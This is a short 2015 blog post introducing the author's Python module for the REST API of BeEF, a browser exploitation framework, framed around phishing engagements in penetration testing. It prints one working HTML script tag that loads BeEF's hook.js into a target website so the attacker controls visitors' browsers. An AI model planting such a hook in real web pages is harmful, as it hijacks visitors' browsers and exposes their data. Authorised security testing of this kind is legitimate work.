Mastodon Hillbilly StoryTime: New Script/Tool: BeEF Restful API in python

Monday, April 6, 2015

New Script/Tool: BeEF Restful API in python

The BeEF (Browser Exploitation Framework) Project is a penetration tool that is focused on attacking and exploiting web browsers.  You can find out more information about the BeEF project at their website as well as on their GitHub page.

How about a little more information on the tool? (not all inclusive, just some high points)
  • BeEF is written in Ruby.
  • It is bundled as part of the Kali Linux Penetration Testing Distro by default.
  • It has a large number of modules which can help in pulling information from, attacking, and exploiting a wide number of web browsers.
  • If properly configured, an attacker can launch Metasploit payloads directly from within BeEF.
  • BeEF has a RESTFUL API.
  • In order to make use of BeEF, an attacker only needs to start up BeEF and add 1 simple line of HTML to the target website.

It is these two items which makes it of particular interest during a phishing exercise/engagement.  The fact that all an attacker needs to do is add one HTML line (see below) to a website to make it work with BeEF is amazing.
<script type=text/javascript src=http://127.0.0.1:3000/hook.js></script>
Combine this with the ability to control, monitor, and pull data from BeEF using its RESTFUL API, and you have a very powerful tool for automating various aspects of a phishing exercise/engagement.

Unfortunately I could not find an implementation of the BeEF RESTFUL API for python that I was happy with.  That is why I wrote my own BeEF RESTFUL API  python module.  It can be found on GitHub at https://github.com/tatanus/beefapi  It does not incorporate all of the possible functions that the BeEF RESTFUL API allows for, but it does incorporate all of the ones I found useful.

Please take a look and use it if you find it useful.  If you have comments/criticisms/etc with the code, please feel free to let me know.

No comments: